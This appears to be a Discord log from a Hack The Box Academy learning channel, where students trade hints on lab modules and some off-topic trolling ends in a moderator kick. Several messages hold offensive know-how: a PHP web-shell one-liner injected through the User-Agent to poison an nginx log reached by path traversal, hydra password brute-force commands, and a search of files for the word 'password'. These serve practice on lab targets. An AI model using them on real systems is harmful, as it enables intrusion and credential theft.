#modules

1 messages · Page 7 of 1

placid quest
#

@cunning oak dm

rugged stag
#

Bruteforcing Usernames: Anyone else having problems with the machine? I've re-spawned it several times, every time it stops working after about a minute or so.

mellow nymph
#

I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer. Can somebody help me out please?

long plover
#

hello

#

what i'm doing bad??

autumn pilot
#

not starting the target and not ssh into it

long plover
#

Solved

#

i have other question

#

i have like 1:30 hours try in comands

#

like simplehttpserver

#

but i can't find what command is

#

i do manually the http server but can't find the command

hollow hinge
long plover
#

i saw this page before

#

and try in commands that i see but not work it

hollow hinge
#

And hints also

long plover
#

have a bug

#

i can't see the hint

#

and the cheatsheet

#

idk what happend

#

SOLVED

#

thanks @hollow hinge

bitter scaffold
#

Hey

#

I hv just started with this thing

#

And i dont know how to connect the ovpn file

#

Can anyone help pls

shadow willow
vivid ember
#

Guys can I play hack box even if I have started to learn python day ago ? Or I need to know just kali? I mean the unix itself kali

#

And is there a real hacking process and nothing fake created? Like Mario the story ?

shadow willow
vivid ember
#

Thx bro

#

Is that for free?

#

Because I really want to become a hacker

#

I learn unix I learn python and will start to learn html

shadow willow
#

sometimes you hang here and there like me now xD
but the learning effect is very good

vivid ember
#

Nah I cannot pay cuz my card is blocked

#

Anyway thx

vital adder
shadow willow
#

what ?

#

subdomain?

vital adder
# vivid ember Because I really want to become a hacker

if you are new to this watch this to know how to be come a hacker also where you can get free stuff https://www.youtube.com/watch?v=lhz0-qAQlBM

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
vital adder
shadow willow
vital adder
#

but you need to find the right domain first

shadow willow
acoustic owl
shadow willow
copper creek
#

anyone for a nudge on the file upload attacks skills assessment? i can't find the upload path

rustic sage
#

.

copper creek
#

u mean of ||script.js||?

brave prawn
#

Hey, currently in Attacking Common Services/SMTP Attacks, found user m, trying to bruteforce with provided list and rockyou.txt, but nothing. Is bruteforcing is correct way to get password of found user?

vital adder
vital adder
brave prawn
copper creek
vital adder
#

try with ||base64||

mellow turtle
#

@copper creek Mb i was thinking on File Inclusion module

copper creek
vital adder
#

sure

mellow nymph
#

I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer.

mellow turtle
#

@mellow nymph the flag

#

it starts with HTB

vital adder
mellow turtle
#

noo dont paste here the flag

#

thats a spoiler :/

pseudo sparrow
#

how can i get started?

vital adder
#

hi pls delete this you can't put htb academy flag in to discord some admin or mod will remind you about this

mellow nymph
#

ok sorry

cyan arch
#

it's fine , just delete the msg

vital adder
# pseudo sparrow how can i get started?

to started with htb academy try this https://academy.hackthebox.com/module/details/15 or with hacking in general try this https://www.youtube.com/watch?v=lhz0-qAQlBM

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
crystal mulch
#

Hello great guys ?,i am new here, just starting a cyber security career any help and tips pls😫 🙏 🙏 🙏 ,best guide line, pls need menthorship too thanks

vital adder
#

my message is right on top of your

arctic acorn
#

I need some help with the final host of the live engagement of shells and payloads. I assume I need to disable smth on the machine so that blue can work, but my shell keeps on crashing, forcing a restart of the whole environment. Any tips on how to make a more stable shell or a different method would be appreciated.

lethal atlas
slender crystal
#

Hello, I'm new.. does anyone has the software download for the flipper zero?

mellow turtle
raven cairn
raven cairn
raven cairn
#

Some of the hak5 stuff you can build yourself tho

#

Im not paying 60$ for a rubber ducky

vital adder
#

me too 🤣

raven cairn
#

This flipper zero tool seems kinda cool tho ngl

arctic acorn
vital adder
west canopy
raven cairn
#

Tru. I don’t know how good the quality is, but I like the idea and dolphins are cute

slender crystal
#

Thanks everyone

lethal atlas
raven cairn
#

I need to buy me some hardware tools

#

Open for recommendations

west canopy
#

same here

#

i need to buy some networking equipment and a server rack

raven cairn
#

I literally just got a server for free bruh

#

No joke

west canopy
#

nice

raven cairn
#

Decent specs too

west canopy
#

i dont even want a working server or networking equipment

#

its just for appearance

#

while i use my windows laptop connected to home wifi

#

basically if you are trying to be a security professional

#

and you dont have a server rack or random pieces of networking equipment all over your house

#

you are doing it wrong

snow mirage
#

Im having a problem understanding how to complete the skill assessment of the Windows Fund. module. Im currently done with all the questions but I am trying to complete the other steps for better practice

#

I cant seem to "find" the default group that needs to be removed when adding HR to the folder Company Data it doesn't show the default group

#

And when I thought I did, I went to the disable inheritance step and my HR group has an enumeration error of permissions in its container

west canopy
snow mirage
#

I feel dumb now shkshkshk

iron river
#

gawd, the File inclusion skills assessment RCE keeps breaking

cyan parrot
#

anyone around who can help with a nudge on Broken Auth Skills assessment? I'm stuck on getting the admin panel.

vital adder
vital adder
cyan parrot
#

@vital adder mind if I DM you?

vital adder
#

sure

flat silo
#

hey guys I'm new. I'm stuck on responder evil-winrm is throwing an error about my python path not being complete. I've uninstalled and reinstalled it a few times still no luck. I did read something that talked about going into the source code deleting a line and that worked before i went through that i was hoping someone may have some advice. I'm also getting a 502 error for Three when i use gobuster to find the s3 bucket. I'm wondering why and how can i get around it? I've tried to reset the machines and I've gone as far as to restore my kali image to an original snapshot. Any advice on these issues would be appreciated thank you.

iron river
flat silo
#

its in starting point tier 1 i may be in the wrong chat for help if i am i apoligize

vital adder
iron river
vital adder
vital adder
#

sure

hardy anchor
#

Hey. I'm in the module "shells and payloads" at "The Live Engagement" and I'm having problems with Eternal blu exploit i need to use to solve this question:
Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

#

Someone did this?

vital adder
hardy anchor
vital adder
#

that is an exploit not a command and exploit is ||ms17_010_command|| also what exploit did you use for the eternal blue

hardy anchor
#

Thanks MRtom

fading bough
#

how to activated win 11

#

how to hack gmail

#

for recovery purposes

#

and to get rit of the secret goverment service

#

hihihihihihihi

#

and how to protect the computer from hackers

shadow willow
fading bough
#

anti virus are usesless againts hackers

#

this ones dont care about anti virus

raven cairn
#

This can help you hack gmail 😱

fading bough
#

oh thanks

#

i will try it to recover my gmail

#

to play league of legends

vital adder
#

@fading bough here is the answer for all of your question, pls don't share this every 3 letter government agencies are looking for this

绝不会放弃你
永远不会让你失望
永远不会跑来跑去抛弃你
永远不会让你哭泣
永远不会说再见
永远不会说谎伤害你

絕不會放棄你
永遠不會讓你失望
永遠不會跑來跑去拋棄你
永遠不會讓你哭泣
永遠不會說再見
永遠不會說謊傷害你
fading bough
#

one of the leader of anonymous need help from other to hack gmail

shadow willow
#

haha

raven cairn
#

Can’t tell if this is trolling or serious haha

fading bough
#

the police deparment hackers made anonymous

#

and also they made the discord app

#

well my englist is petty bad

shadow willow
fading bough
#

i will try read this guys to improve my english

raven cairn
#

I am vice leader of anonymous

raven cairn
#

English is super difficult haha

fading bough
#

to avoid hackers you have to make you own operate system

vital adder
fading bough
#

and you own programing language

shadow willow
brave prawn
#

Can I dm someone about Attacking Common Services Lab Easy? Found creds, but then stucked

fading bough
#

i want to live forever

#

but i need help from others people

#

to make the machine that make you live forever

shadow willow
#

here you are right

mellow turtle
#

._.

fading bough
#

so i have to make people want to live forever

#

so other start to work on the project of living forever

#

in the future people will be able to leave forever

vital adder
fading bough
#

blackbear i am luffy

#

the real one

#

one piece is my life story

shadow willow
#

I've never watched one piece

#

xD

fading bough
#

good for you

#

is a waste of time

#

i waste my life on the first chats room ever created

vital adder
fading bough
#

terry a david

#

a bet that no one can hack that os

raven cairn
#

Wano arc is awesome so far

#

Also stop spamming this channel Lmfao

fading bough
#

discord is the son of those chats rooms

#

thoses are the first chats rooms ever created

rustic sage
#

pls sent my the link for dowlaod the noescape.exe

#

no troll

fading bough
#

terry was my teacher

#

but i hate to study

#

so i am his worst student

rustic sage
fading bough
#

is noescape a photo editing app?

rustic sage
#

no

#

virus

fading bough
#

my pc cant handle more virus so i cant risk my self of getting that virus

rustic sage
#

ok

red obsidianBOT
fading bough
#

well let me keep trying to learn programming

#

so i can get a job

#

after ten years of trying

#

i am finally usdestading it

#

i believe that i am haft way of learning C#

shadow willow
fading bough
#

i am learning making app and wacthing yuotube tutorias

#

so to live forever before i die

#

i need at least 10 millios of people working it living forever

#

i problably have to make posters and put them on the street

#

..... a virus is a program

#

just sharing my knowledge to pay others for helping me

#

the serie mr robot might be helpful for beginers

#

i am mr robot too.....

#

i will try to make a bot for discord i might made 10 dollars

#

each month

#

and hopefully no one try to hack a bank

#

is a very bad idea

#

zero days hunter is a better idea

#

now days the police can find you without any informaction

#

...........

#

i want to live forever

autumn pilot
#

please keep it on topic with the channels name

#

stop with the nonsense

fading bough
#

i will try to improve my writin

#

writing

#

but i need help to live a longer life

autumn pilot
#

wrong server then

fading bough
#

i need smart guys helping me

#

here we have some smarts gays

autumn pilot
#

step aside from the keyboard and take a break

#

next nonsense that you paste will result in a kick

fading bough
#

the last mod who hate me and kicked me appeared death..............

#

and here we go

autumn pilot
#

++kick @fading bough

fading bough
#

1.5 billio again

little whaleBOT
#

programmerx got the boot!

vital adder
#

hi dpgg while you here there is a guy posting a flag about some module i did tell him to remove that but he didn't so can you remove that?

raven cairn
fading bough
#

dpgg did the 911

night pier
#

Can anyone give me a hint on active directory skills assessment 2. Trying to grab the flag on sql01. I have xp_cmdshell going but no access to admin user

fading bough
#

he hacked the plane

#

spooner you should also try to live 10 000 years

#

or live forever

little whaleBOT
#

@fading bough (1015286483646697592) has been muted for 10h.

tender dawn
#

where can i learn to be a script kiddie

jade pendant
#

Hi

summer lava
#

@jade pendant HI

jade pendant
#

What's up

vale salmon
#

Okay, I'm having a really weird issue. I am working on Attacking Common Services: Easy Lab. I found a user name for the ||smtp|| server. I am using hydra to try and brute-force the password using rockyou.txt on ||pop3||. Everytime I do, though, be it my attack box or the Pwnbox, hydra starts running, then after a moment, outputs a C and then freezes up. I end up having to terminate hydra with Ctrl-C. Am I the only one who has had this issue? This only seems to happen with that particular protocol. Nvm. I'm dumb. I was trying to use a protocol I didn't have an open port for.

delicate osprey
#

Hello. Any help for module Secure coding 101 javascript question :

#

On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag.

#

thanks

mystic fern
#

Is there a discord group for tryhackme ?

vale salmon
#

Okay, so for Attacking Common Services: Easy Lab, I have full credentials, but I'm not sure what direction to go to from here. Any nudges?

west canopy
#

@vale salmon try to ||write a php shell into the xampp webroot .... there are two ways to do it !||

rigid minnow
#

Could some one tell me what command to use to get to the root server

west canopy
vale salmon
#

Okay, so on the Attacking Common Services: Easy Lab, I'm having trouble figuring out how to ||upload my reverse shell to C:\xampp\htdocs||. I've tried a few methods with no luck. Also, my target keeps running out of time at a rapid speed, which is odd and annoying.

west canopy
vale salmon
west canopy
#

eh , different way to skin a cat

vale salmon
west canopy
#

sure

timber light
#

hi can anyone help me with Firewall and IDS/IPS Evasion - Medium Lab. kinda lost Solved. Thanks those that helped.

timber light
timber light
lethal atlas
#

DM me

rugged stag
#

Predictable Reset Token (Broken Authentication module): Someone could give me a nudge? I think I know what they want, but spent hours on it and still doesn't work. Just want to see if my approach is good or way off.

languid dawn
#

Don't advertise here, it's against our rules. Thanks.

feral stump
#

hey! anyone can help with Information Gathering - Web edition / Active subdomain enumeration section?

#

thanks!

acoustic owl
#

Did you find the solution?

shadow orbit
#

Hi I have problems with ATTACKING COMMON SERVICES -> Attacking Common Services - Hard module. I can login via RDP using F*** user, howver I can not login into MSSQL server. I have tried via management studio and via sqlcmd. I tried with command as "sqlcmd -S WINSRV02 -U F+++ -P '+++' -y 30 -Y 30" but no success

delicate osprey
delicate osprey
clear bough
#

hi everybody, i'm stuck in File Upload Attack module on Limited File Uploads , on question 1 : "The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"" .... i've tryed all payload but the app don't display anything .... any help??

drowsy cobalt
delicate osprey
drowsy cobalt
#

ok, i get it

rugged stag
#

Have you been able to solve it (Bruteforcing cookies, 1st question). I decoded the cookie and changed it, but it doesn't work. Would like to know if I'm missing anything here.

stray grove
quick plaza
#

hi, I'm going through the knowledge check in getting started module but I'm stuck at exploiting getsimple cms. it seems that the server is somehow dropping all POST requests - I'm not able to edit the theme to include reverse shell php code, same thing is happening when I use metasploit with RCE exploit. just getting no response at all from the server. the file upload button is not working as well. did someone have the same problem? I've seen one person mentioning it in the forums but they got no response to this. EDIT: it seems that it's a bug when working from Parrot OS VM, it works fine with pwnbox. I'll report it in #858470491676737536

north marten
west canopy
# delicate osprey I can help you if you want 🙂

Haha thanks bud! I think I have read the section over like four times, I have the JS unpacked and have renamed all the variables so that my code matches the examples. But i honestly just don't understand what i am supposed to do to "use" the decoder and produce the answer, Am i supposed to use the console in the browser tools or something?

swift dune
#

Heyy all,
I am stuck at Predictable Reset Token question 1. I modified the script for the proper timezone and user but still is not working. If anyone could give me some help it's going to be great.
10x in advance

north marten
limpid plover
#

Hi guys. How much I will pay in total for the Junior Pentester path?

vital adder
limpid plover
rustic sage
#

hello i am stuck at end of module USING WEB PROXIES

rapid wing
#

hello everyone, nice to meet you, i've just graduated from highschool in it science, i'd love to work one day as ethical hacker, and so i just sign up on htb academy. I'm actually a fullstack developer and i know networking pretty good but Im new into cybersecurity field, do you guys have some tips, even youtube channels or also other sites that could help me learning? Thank you very much

rustic sage
#

i need to know how to fuzz the words together and output it in a file

#

for example (word) would be milk - and (letters.txt) would be a-z, then output it (word_letters.txt) would be milka milkb milkc milkd...

#

i know ffuf can do it, but i really can't find anything today

rustic sage
rapid wing
vital adder
# rapid wing hello everyone, nice to meet you, i've just graduated from highschool in it scie...

if you have some developer experience and know a good bit about networking then you already have a good foundation here check this video to see what you are missing then you are good to go https://www.youtube.com/watch?v=lhz0-qAQlBM

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
vital adder
vital adder
rapid wing
#

ok, thank you very much, im gonna check that too

vital adder
night pier
#

Any hints on how to get to MS01 on the Active Directory skills assessment 2? I'm running printspoofer from SQL01 but not sure how to leverage that to get over to MS01. From chat history, lazagne isn't dumping any passwords

vital adder
west canopy
clear bough
little burrow
#

hi everyone , how to bypass LFI filter ".." string ?

west canopy
#

@little burrow you could try four dots and two slashes 😉

little burrow
#

@west canopy yep , but not work with me 😦 , filter code look like "||<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>||"

little burrow
#

I tried to RCE LFI by poisoning logs at ||/var/log/nginx/access.log&cmd=id|| with user-agent = "<?php system($_GET["cmd"]); ?>" but without success , can anyone suggest me ?

rustic sage
little burrow
#

😢

copper creek
#

anyone else get flag4 before flag3 on linux privesc skills assessment? 😂

clear orbit
#

I am in the module "getting started". and in one of the sections I have to get a banner of the server. I connected to the ssh and used netcat
but it doesn't work
after a little bit, it says timeout

#

Anyone help?

shut orchid
#

someone send me a virus

vale salmon
#

On the Attacking Common Services: Medium Lab, should I use the provided users.list or a list from SecLists?

shut orchid
#

someone steal my discord by link

#

someone send me a link to steal my discord

vale salmon
shut orchid
#

@vale salmondo you want to invade my discord?

vale salmon
shut orchid
#

please

#

@vale salmonyou are my friend now

vale salmon
#

@shut orchid No, and I will block you if you persist

spark vector
#

Hello everyone, I'm trying to crack a private ssh key, but I would like some guidance. I tried to ssh2john (ssh2john id_rsa > id_rsa.hash) to convert it to a hash, but I get this message "id_rsa has no password!" Any pointers on leveraging an SSH private key?

shut orchid
#

михо.rwr

vale salmon
#

@spark vector What module are you working on?

spark vector
#

@vale salmon Footprinting Lab - Hard

shut orchid
#

@vale salmonyou are 25 years? old you are very humble😀

#

I'm making pizza

#

😝

vale salmon
#

@spark vector I can't remember for certain, but if you have the username associated with that id_rsa, you should just be able to ssh in with it using ssh -i id_rsa <username>@<target ip>

shut orchid
#

what a wonderful dialogue

#

jansefpyder-magdielcrhis-jamesbap-

#

@spark vectorcan you create a bank account for me to save money?

spark vector
#

@vale salmon Thank you. I tried that, but I think I have the wrong username. I'll keep enumerating. I get this when I run ssh
Load key "id_rsa": invalid format
USERNAME@TARGET IP: Permission denied (publickey).

vale salmon
shut orchid
#

what is this server doing🤨

spark vector
#

@vale salmon Don't sweat it. Thanks for the reply.

stray grove
spark vector
shut orchid
#

@stray grovecreate a paypal account for me

spark vector
#

@stray grove I think it might be the username because if I use a different username I get prompted for a password. I still get the invalid format though

stray grove
#

the username start with t, if you did an snmpwalk enum you'll find some credential. you need to enumerate snmp service first

spark vector
#

@stray grove Did that. I got the password.

#

If I use ssh t@target IP, I get the invalid format and Permissions denied. But, If I use b@target IP, I get the invalid format and it prompts me for a password.

stray grove
spark vector
#

Yes

stray grove
# spark vector Yes

then check the key, must have some blank spaces in it...open it using sublime

spark vector
#

@stray grove Now I have to know what sublime is 🙂

stray grove
stray grove
spark vector
lyric echo
#

Hey yall! Can someone help me with the File Inclusion Assessment? All LFI attempts I am trying is only returning 'Invalid Input Detected'

lyric echo
#

Hey yall! Can someone help me with the File Inclusion Assessment? All LFI attempts I am trying is only returning 'Invalid Input Detected'

vale salmon
frozen atlas
#

Can anyone teach me also?

vital adder
bronze flare
#

Can someone help me with the ffuf skills assessment? I’ve been at it for a month, but for some reason, my ffuf doesn’t return an important result for me.

vital adder
bronze flare
#

The third fourth and fifth questions.

vale salmon
vital adder
bronze flare
#

You might be asking yourself: why is a pro-hacker here asking for help on a beginner module?

vale salmon
vale salmon
vital adder
#

i need help with a lot of dumb stuff here and finished like 400 room on tryhackme and i'm still dumb

bronze flare
#

I remember he said that in the video writeup he did for that box.

vale salmon
#

Yep. We all have gaps to fill in, constantly

vital adder
vale salmon
#

Yeah, I had the same issue with that one

bronze flare
#

maybe it’s the command I’m running? Can I post it publicly or do I have to drop into a DM for that?

#

Or with a spoiler flag?

vital adder
#

if it's just the command i think it's fine because you didn't find anything with that also spoiler tag

#

oh and for the ffuf scan try the extensions you found from the ||second question||

bronze flare
#

And I do that for all three virtual hosts

#

I even tried matching regex for the page content mentioned in the third question, but nope.

vital adder
#

oh you are on the wrong ||virtual hosts|| in this commmand also the page you need to find is in a ||directory|| so you need find that first and the page you need is in that

bronze flare
#

I forgot to include the recursion part, because I’m running it with recursion depth 3.

vital adder
#

and no idea if this help but i use ||directory-list-2.3-small.txt||

bronze flare
#

Tried different wordlists, and I used that one.

#

I do find that directory. Maybe I need to not use recursive mode once I find it?

vital adder
#

maybe not sure but try that

bronze flare
#

but maybe the reset trick works.

#

What do I do? Send a bunch of RST packets to the host? That won’t help much.

vital adder
bronze flare
#

I’ll try later. Thanks for the advice.

vital adder
bronze flare
#

||I think I have to use dots: .php,.phps,.php7||

vital adder
#

just try that's also is not working for me

lyric echo
vale salmon
#

For Attacking Common Services: Hard Lab, should I be using the pws.list provided or rockyou, or something different? Nvm

vale salmon
#

Okay, I'm stuck. I have credentials for ||fiona|| and can ||RDP|| in with her, but I can't figure out how to grab ||John's|| password (or Admin Credentials)

hollow thunder
vale salmon
raven storm
raven storm
vital pike
#

why do I have access only to the academy channels ?

hollow hinge
balmy moon
#

Good morning everyone!

Has anyone done the Footprinting Lab and found the creds without the hint?

I was wondering how to get the creds without the hint.

balmy moon
#

Oooops sorry the Easy. The hint showed the username and password, but I would like to know how they got that.

feral stump
#

It is though for ssh

balmy moon
#

No worries, moved on to the Medium lab, but if anyone wants to share insight on how to do that lab withoug the Hint, please do!!

feral stump
#

Feel free to dm me if you need help

#

On the medium and hard labs

balmy moon
#

Awesome thanks!

leaden abyss
balmy moon
#

Can anyone give me advice on how to crack the Techsupport folder on a NFS share. (Footprinting/Lab-Medium)

brave prawn
#

Hey, need help with Attacking Common Services Medium Lab. Found a username, but bruteforcing make no results. Can someone give a hint? Thanks

shadow willow
#

iam sure it must be "AV"

acoustic owl
acoustic owl
brave prawn
proud wind
#

Hey wanna die

#

@acoustic owl angry ribbet

#

<@&817153850845823057>

#

We got spammer

#

in the house

#

hey o mods

#

we got spammer

#

and a alt account

#

THERES A ALT!

#

i knew it

#

MODS BAN THE ALT

#

CAN I HAVE MOD PLS

brave prawn
#

Can I DM someone about Attacking Common Services Hard Lab?

acoustic owl
mossy epoch
#

Hi, I am stuck on the Stack-Based OVerflow Linux x86 Skill Assignment. I got a working shellcode with read_file exploit but it doesn't work. Any hint?

little burrow
#

i have trouble with target server in Skills Assessment - File Inclusion , It only works for about a minute and it can't load 😦

mellow turtle
#

I can help u, dm me

#

I'm having a problem with Hacking Wordpress - Skills Assesment can somebody help me?

vale salmon
#

||So on Attacking Common Services: Hard, I am beating my head against the wall. SQL is not my strong suite. I've found the linked server and even found the testadmin, but I can't impersonate it and can't otherwise figure what to do from here. This lab is driving me nuts.||

vital adder
west canopy
#

Hello friends

foggy stirrup
#

need some help, dunno where to find the cleartext creds for the ||tpetty|| user in the AD enum and attackse module skill assessment part 1

#

oh wait

#

might have an idea

foggy stirrup
#

oh got it

#

:D

vital adder
pine dagger
#

Hello! I must be over thinking things. For Attacking Common Services Easy, I've found an ||email account||, but can't seem to figure out the password. Am I barking up the wrong tree? Just looking for a pointer to get started as I've tried looking at the ||ftp, rdp, and sql|| services but no luck.

vital adder
#

yay 🥳

acoustic owl
foggy stirrup
#

reeee im tryna speedrun AD enum and atks

#

on day 4 rn tryna get that last section

#

skill assessment II

vital adder
# vital adder yay 🥳

i got like 7 module left on the pentest path but i procrastinate so much that i finished the bug bounty path first

pine dagger
vital adder
rustic sage
#

Hi would anyone be able to help me with the Login Brute Forcing: Skills Assessment - Service Login Section I have found the user :||harry|| a have attempted to brute force the login multiple times and tried using the forums tips and still no luck?

vital adder
pine dagger
#

Thank you ❤️

rustic sage
#

the regrexes here may be slightly off as I had to hand type them from my vm

vital adder
#

i can't remember but i think that is the next to to firstname

rustic sage
#

Surname?

vital adder
#

yep that one

rustic sage
#

so use ||Potter|| I have tried it before but ill give it one more run and get back to you

#

also does case matter?

#

in cupp

vital adder
median bison
#

So I am doing the Nibble box/module, and my VPN keeps disconnecting, it doesnt say its disconnected but I have a 100% packet loss, I have restarted the VPN, my laptop and everything else I could think of. Anyone have any advice? Thanks!

median bison
#

I am using the VPN and using a personal machine

vital adder
#

having both pwnbox and your vpn on is usually is cause of your issue but if you pwnbox isn't on then i have no idea try asking this in #613049811481919508

median bison
#

Alright will do, thanks!

rustic sage
#

even without filtering just in case my regrex is messed up and accidently getting rid of the correct passwd

vital adder
#

i just try your sed filter command and it's working fine also are you brute forcing ||ssh||?

rustic sage
#

yes just in case im stupid I will type out my cmd here

#

hydra -L username-anarchy/username -p||harry.txt|| -u -f ssh://IP:PORT -t 4

vital adder
#

yep that's the right command

rustic sage
#

Huh i dont get what the issue is and when you tested cupp it was the same as I specified?

vital adder
#

yep for the last Y/N in cupp i use Y for the last ||3||

#

shoot me a dm i'll help you troubleshoot

rustic sage
carmine lark
#

Hi all.
I am stuck on the last question of SQLi before the skills assessment.
"Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."

So after getting the shell I use the command ls -la and saw listed directories and files and saw that vendor was the only directory listed. I used the command again ls -la vendor and only 2 directories where listed and .htaccess.

I have searched both these directories and "cat" the .htaccess file however no mention of the second and final flag. Can anyone give me a nudge in the right direction, i've been on this question for a couple of days now and just want to move on.
Thanks

west canopy
#

@carmine lark DM me 🙂

safe leaf
#

Going through web proxies and trying to figure out the url encoding / decoding segment, seems like it should be really straight forward, but I'm just not getting a meaningful flag

#

Look like I do a base64 decode initially due to the = at the end, the next few iterations look like they'd potentially be more base 64 (still have = at the end), but I end up with a string that doesn't seem to have any meaning, have tried all different combinations and looked at the hint and still not really getting anything reasonable

#

Nevermind, just need to go one more iteration deep apparently

frail garden
#

Helloo! Can i DM someone to help me with the last question of DNS on Footprint Module? What is the FQDN of the host where the last octet ends with "x.x.x.203"? I can't figure it out. EDIT: Solved!

spark vector
#

@frail garden What have you done to try to answer this question?

acoustic owl
frail garden
#

@spark vector I tried to query the zone with dig axfr. Also bruteforce subdomains

#

@acoustic owl i believe i have found all the zones but no luck finding the host with the .203 octet

spark vector
#

@frail garden focus on the keywords.

short brook
#

Hello, I require assistance on the 'Getting started' module. I am currently busy with "Pentesting basics/Public exploits".

#

I have tried to scan the given target with nmap, but it says the host seems down. I can search the ip in google and it gives me the website. What else do I have to do in order to find the running services?

west canopy
#

@short brook try navigating ||to the target:port in your browser with http protocol :)||

#

With Docker targets, typically nmap scans aren't necessary as there is just a single port open

#

and you can tell its a docker target when it spawns if it has a long port number after it

#

for example 10.129.7.40:30385

short brook
#

Ok so how do I find the running services on the website?

west canopy
#

look around

#

it will literally jump out in front of you

#

when you access the website 😉

#

maybe there is a way we can|| target the wordpress plugin being used...?||

limber siren
#

Hello, I'm currently doing web request module and For the last time I couldn't find server.php file in browser network, it wasn't there.. What might cause that? Am I doing something wrong? *I'm using HTB machine, not mine...

raven cairn
#

Could I have help with the LFI skills assesment? I was able to get to an admin panel, but I am having trouble with RCE

twilit cipher
#

Anyone around to help with:
Broken Authentication - Bruteforcing Cookies question 1 ???

raven cairn
twilit cipher
#

I have the cookie decoded and re-encoded, but it seems like there is some guess-work involved with the role???

little burrow
#

every attempt to poison the log file fails

little burrow
raven cairn
#

@little burrow I'm not sure if this will help but I was able to find a log file at || ../../../../../../../../var/log/nginx/access.log ||

#

Going to try out a log poisoning attack

little burrow
#

but the access log doesn't log my user-agent

raven cairn
#

very tough skills assesment haha

west canopy
#

@raven cairn i might be able to help

twilit cipher
#

This guessing game is killing me....

west canopy
#

@twilit cipher i got you dawg

vale salmon
#

If someone has a moment and has done the Pivoting, Tunneling, and Port Forwarding module, could you shoot me a DM? I have some questions about the Meterpreter Tunneling & Port Forwarding section.

viscid hamlet
#

Wsg

lyric echo
#

Hey Yall! Can someone please help me out with File Inclusion assessment? I haver gotten as far as accessing both access/error log in admin panel, but nothing Im doing seems to be working including poisoning User-Agent and using wrappers

lyric echo
half junco
#

Hi. Sorta new to HTB but got back into it after friends I reconnected with helped me get back into trying to learn via HTB Academy. Is there anyone who can help me understand SQL Injection Fundamental - Subverting Query Logic? I'm trying to figure out logging in as 'tom' instead of 'admin'. Not really looking for spoilers since I try to avoid cheating when I learn.

half junco
#

Just got it now. I feel dumb thanks to my overthinking. XD

balmy cipher
#

Hey anyone around to help with the file upload skill assessment? I am stuck trying to get a webshell and I keep getting: 'The image "URL" cannot be displayed because it contains errors.'

vital adder
balmy cipher
vital adder
balmy cipher
vital adder
little burrow
#

Is everyone using the normal target server ? , I turned on target server and it seems to work only for a few seconds and then the website can't be loaded 😦

echo willow
#

need help with Active Subdomain Enumeration

barren minnow
#

Who’s very good at pen testing?

rustic sage
#

good morning i'm having some issues with the last question of the login brute forcing module... i used this command in order to brute force the password of the g.potter user but it's not retrieving any resaults and i don't get what i am missing.. hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4

loud bone
#

hello

timber light
#

Hi, looking for help for ATTACKING COMMON SERVICES - SQL section. i got the mssqlsvc password but when i tried to login using sqsh, its saying login failed mybad i am in

barren minnow
#

Why is there no directory

loud bone
balmy moon
#

Good Morning! Can I get an assist with the Footprinting Lab - Medium please? I have retrieved the sql creds, and I'm struggling with what to do.

languid dawn
#

id_rsa, if it exists, will be in the .ssh folder. Probably.

inland condor
#

hi

#

hi

#

anyone

vital adder
tame atlas
inland condor
#

do you know hack

tame atlas
#

I'm not to good

#

gtg

inland condor
#

what do you hack

languid dawn
#

Hello, I'm not sure what your question is but keep in mind that we do have #rules
Also this isn't a discord to hire hackers.

rich mulch
#

====
Hello guys, I would like to find all files contain string "password", but I want to exclude not to find in specifi path such as C:\Windows. How I can do that?

I did try

findstr /SIM /C:"password" | findstr /v /i /C"\\Windows"

But it does not work. Any suggestions?

barren minnow
#

@loud bone yes I did

loud bone
tight mesa
#

hi, anyone knows if in HTB is there any way to make a search filtered by subject like web, ad or something like this...!!!

barren minnow
#

@loud bone I think there’s no ssh directory

timber light
#

Hi, for ATTACKING COMMON SERVICES - DNS how do i get the bruteforce to work?

haughty jay
#

Can anyone give me a hint on Broken Authentication -> Bruteforcing Cookies? I'm not able to decode the rememberme token

gloomy tangle
haughty jay
#

I don't know what to do with this wierd code

faint trellis
#

AD Enumeration & Attacks - Skills Assessment Part II
Guys need your help with fixing an error within privileges escalation to SYSTEM on the SQL01 using the PrintSpoofler.exe.
Who knows whats wrong? How did you get this rid to receive a shell on your listener? Thanks for any help.

VERBOSE: 172.16.7.60,1433 : Connection Success.

output

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 2

faint trellis
acoustic owl
#

I used ||PrintSpoofer64.exe||

faint trellis
shadow willow
#

Hello
can i reset my modules ? 😄

#

